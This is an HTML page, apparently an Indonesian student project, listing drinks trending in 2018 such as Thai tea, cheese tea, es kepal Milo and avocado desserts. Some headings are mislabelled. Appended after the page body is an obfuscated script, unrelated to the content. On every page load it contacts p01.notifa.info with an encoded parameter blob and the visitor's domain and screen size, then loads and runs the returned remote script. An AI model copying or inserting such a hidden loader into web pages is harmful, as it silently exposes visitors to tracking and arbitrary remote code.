<HTML>
  <HEAD>
	<TITLE>UAS MINUMAN</TITLE>
	<style TYPE=text/css>
	  header, section, footer, aside, nav, article, figure, figcaption {
          	display: block;
		}
	  body {
		COLOR : auto;
		background-color: grey ;
		background-image : url("images/bg.gif");
		background-position: center;
		margin : 0px;
		}
	  .wrapper {
           	width: 940px;
          	margin: 20px auto 20px auto;
          	border: 4px solid rgb(241, 166, 20);
          	background-color: rgba(252, 252, 252, 0.95);
		}
	  header {
          	height: 220px;
          	background-image: url("images/logo.jpg");
            background-size: cover;
		}
          h1 {
          	text-indent: -9999px;
          	width: 940px;
          	height: 190px;
          	margin: 0px;}
          nav,footer {
          	clear: both;
          	color: #ffffff;
          	background-color: #1a1920;
          	height: 30px;
		}
	 nav ul {
          	margin: 0px;
          	padding: 5px 0px 5px 50px;
		}
          nav li {
          	display: inline;
          	margin-right: 40px;
		}
          nav li a {
           	color: #ffffff;
            font-size: 1em;
		}
          nav li a:hover, nav li a.current {
         	color: rgb(241, 166, 20);
		}
          section.courses {
          	float: left;
          	width: 659px;
          	border: 5px solid #eee;
		}
	  article {
          	clear: both;
          	overflow: auto;
          	width: 100%;
            padding: 50px 0px;
		}
          hgroup {
         	 margin-top: 40px;
		}
          figure {
           	float: left;
          	width: 290px;
          	height: 220px;
          	padding: 5px;
          	margin: 20px;
          	border: 1px solid #eeeeee;
		}
          figcaption {
          	font-size: 90%;
          	text-align: left;
		}
	        aside {
          	width: 230px;
          	float: left;
          	padding: 20px;
		}
	        aside a {
      	     display: block;
      	     padding: 10px;
      	     border-bottom: 1px solid #eeeeee;
      	     }
      	  aside a:hover {
      	    color: black;
      	    background-color: rgb(254, 244, 23)}
      	  a {
      	    color: #b81d3f;
      	    text-decoration: none;
      	    }
      	  h1,h2,h3 {
      		font-weight: normal;
      		}
      	  h2 {
      		margin: 10px 0px 5px 0px;
      		 padding: 0px;
      		 }
      	  h3 {
      		margin: 0px 0px 10px 0px;
      		color: black;
      		}
      	  aside h2 {
      		  padding: 30px 0px 10px 0px;
      		  color: rgb(241, 166, 20);
      		  }
	</style>
</head>
  <body>
	<div class=wrapper>
	  <Header>
	   <H1>Warung Tegal</H1>
	     <nav>
		<ul>
              	   <li><a href="index.html" >Home</a></li>
              	   <li><a href="trend.html" class="current" >Trending in 2018</a></li>
              	   <li><a href="profile.html">Profile</a></li>
              	   <li><a href="contact.html">Contact</a></li>
		</ul>
	     </nav>
	  </Header>
	  <Section class=courses>

		<article>
                       <figure>
                           <img src="images/thaitea1.jpg" alt="Thai tea"></img>
                           <figcaption><i>Thai tea</i></figcaption>
                       </figure>
                       <hgroup>
                           <a name=thai><h2>Thai tea</h2></a>
                       </hgroup>
                       <p>Demam Thai tea sudah tinggi sejak akhir tahun 2017 hingga awal tahun 2018. Dum-Dum Thai tea, salah satu merek minuman yang banyak digandrungi dan mempelopori tren Thai tea di Indonesia. Kini penjual produk serupa sudah menjamur, mulai dari harga Rp5.000 sampai Rp25 ribu. Kamu bisa pilih sesuai selera rasa dan bujet.</p>
		</article>
		<article>
                       <figure>
                           <img src="images/cheesetea.jpg" alt="Cheese Tea" />
                           <figcaption><i> Cheese tea</i></figcaption>
                       </figure>
                       <hgroup>
                           <a name=cheesetea><h2>Cheese Tea</h2></a>
                       </hgroup>
                       <p>Cheese tea ini awalnya muncul dan populer di Taiwan sejak 2010 lalu, tapi di Indonesia baru ramai pada 2018. Sesuai namanya, cheese tea merupakan perpaduan teh dan krim keju yang gurih. Seiring perkembangannya, variannya bukan cuma teh, tapi ada juga cokelat, green tea latte, dan sebagainya.</p>
		</article>
		<article>
                       <figure>
                           <img src="images/eskepal.jpg" alt="Es kepal Milo" />
                           <figcaption><i> Es kepal Milo</i></figcaption>
                       </figure>
                       <hgroup>
                           <a name=eskepal><h2>Es kepal Milo</h2></a>
                       </hgroup>
                       <p>Sekitar bulan April 2018, sebuah kedai di Yogyakarta yang menjual ais kepal Milo mendadak viral di media sosial hingga televisi. Perpaduan es serut dan disiram saus cokelat kental yang  terbuat dari Milo tampak begitu menggiurkan.
Es kepal yang asalnya dari Negeri Jiran ini akhirnya menjadi tren di Indonesia. Banyak penjual es kepal Milo dadakan yang mencoba peruntungan. Selain Milo, akhirnya varian es kepal makin berkembang seperti green tea, es kepal aneka topping, dan sebagainya.
</p>

		</article>
		<article>
                       <figure>
                           <img src="images/alpuka.jpg" alt="Alpukat kerok" />
                           <figcaption><i> Alpukat kerok</i></figcaption>
                       </figure>
                       <hgroup>
                           <a name=alpuka><h2>Alpukat kerok</h2></a>
                       </hgroup>
                       <p>Pada dasarnya, daging alpukat dikerok tipis, disajikan dengan es serut dan aneka topping. Mulai dari Milo, bubuk green tea, es krim, susu kental manis, hingga berbagai taburan buah. Jenis minuman seperti ini biasanya dijual di kedai makanan atau kafe-kafe.</p>

		</article>
		<article>
                       <figure>
                           <img src="images/alpukatk.jpg" alt="Alpukat Kocok" />
                           <figcaption><i> Alpukat Kocok</i></figcaption>
                       </figure>
                       <hgroup>
                           <a name=alpukatk><h2>Alpukat Kocok</h2></a>
                       </hgroup>
                       <p>Seperti judulnya, daging buah alpukat dikocok hingga bertekstur kasar menggunakan sendok maupun alat penghancur khusus. Kemudian bagian atasnya diberi serutan es dan aneka saus, seperti Milo, Nutella, Ovomaltine, pudding, dan lain-lain. Gak cuma kafe, kamu pun bisa menemukan olahan alpukat segar ini di stand minuman pinggir jalan atau saat ada pasar malam.</p>

		</article>
		<article>
                       <figure>
                           <img src="images/eskrim.jpg" alt="Es Krim Taiyaki" />
                           <figcaption><i> Es Krim Taiyaki</i></figcaption>
                       </figure>
                       <hgroup>
                           <a name=eskrim><h2>Es Krim Taiyaki</h2></a>
                       </hgroup>
                       <p>Taiyaki sebenarnya nama salah satu camilan asal Jepang berupa adonan pancake yang dipanggang dalam cetakan berbentuk ikan dan biasanya diisi kacang merah. Kue ikan ini sudah familiar ditemui di Indonesia, tapi dengan varian yang sudah lebih kreatif.
Salah satunya es krim taiyaki. Adonan pancake berbentuk ikan ini menggantikan fungsi cone atau waffle, dengan topping beraneka macam yang bikin ngiler.
</p>

		</article>
		<article>
                       <figure>
                           <img src="images/twin.jpg" alt="Twin cup" />
                           <figcaption><i> Twin cup</i></figcaption>
                       </figure>
                       <hgroup>
                           <a name=twin><h2>Es Krim Taiyaki</h2></a>
                       </hgroup>
                       <p>Minuman 2 in 1 jadi alternatif buat kamu yang pengin nyobain beberapa jenis minuman dalam satu waktu, yakni menggunakan twin cup. Gak cuma dua, sekarang muncul juga varian gelas baru yang memungkinkan kamu memesan tiga jenis minuman sekaligus.</p>

		</article>
		<article>
                       <figure>
                           <img src="images/floaties.jpg" alt="Floaties drink" />
                           <figcaption><i>Floaties drink</i></figcaption>
                       </figure>
                       <hgroup>
                           <a name=floaties><h2>Es Krim Taiyaki</h2></a>
                       </hgroup>
                       <p>Apa-apa yang Instagramable memang lebih cepat viral. Floaties drink ini contohnya. Sebenarnya varian minumannya tidak ada yang spesifik, hanya saja floaties atau balon lucu ini menjadi pembedanya.
Originally, floaties tersebut diperuntukkan bagi mereka yang ingin bersantap di kolam renang, supaya tetap bisa menikmati minuman sembari dalam air. Namun kini minuman serupa hadir di kafe atau bazar makanan kekinian.
</p>

		</article>
	  </Section>

	  <aside>

          <h2>Minuman Populer</h2>
        	      <a href="index.html#kopi">Es Kopi Susu</a>
                <a href="index.html#boba">Brown Sugar</a>
        		    <a href="index.html#regal">Boba</a>
          	  	<a href="index.html#thaitea">Minuman dengan Regal</a>
             		<a href="index.html#brown">Thai Tea</a>

       		<h2>Kontak</h2>
            	<p>Muhammad Farhan<br />


       	  </aside>
	  <footer>
	   	 <marquee behavior=alternate >&copy; 2020 Muhammad Farhan</marquee>
	  </footer>
	</DIV><!-- .wrapper-->
  <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncXGZvz%2fZNFti9JgCwGGTirS4XEkmexNnURbrr6vRfpUkQQl4PlMI3aQF8b4k0kkvK4m%2bTL297P5yfY%2fBZoaBSMz7K55%2fmP3GkpoqEZ1rZnVZruQMbGgr2w5vpqzsGG6%2f1bEqnZS6m9iPa%2fs21IOc9AAqnTimY3N7rydUAv8%2bgt3DQQIiM3eibsq4IP1bnSNh8c42M3juQw2LHGIx0Rx25ZTPx63erK9YiMuoCNqdlUNYi2BH6xaM1qx2zw7AlijVdBFIMRw7vRV4nSndHI2g1SaZVHmwCK1BnbNwoksJW6p59MozOUJdStxIGCudvYs%2b1spYuS9YMO0AKSHUjx4yqMJuzVSPuraQcMvJ4SU97FJleFWjkjcbkwixsDp%2fJ9C4o2LYos6hBQNr096Cj%2f7%2fEb1gn10fSYySrMxy9zPOqtip6zuF%2bwt%2frqZegNfJFvBySbiWGJXd1Co2x7ijtzd531vO37QMgYBF2v6lhW5chn24pOFQgX8%2feAHO9fcJrVEnJ8b0bYMz1%2bd46E%2fu%2fzBJE8iVdFstq5ChazgI%2bQ3gt2S61%2bfnNpiGBUWcPmeGFOnyakLhIV2utUfivMhH7hhhYPH0RDbVpbgddA" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></BODY>
</HTML>
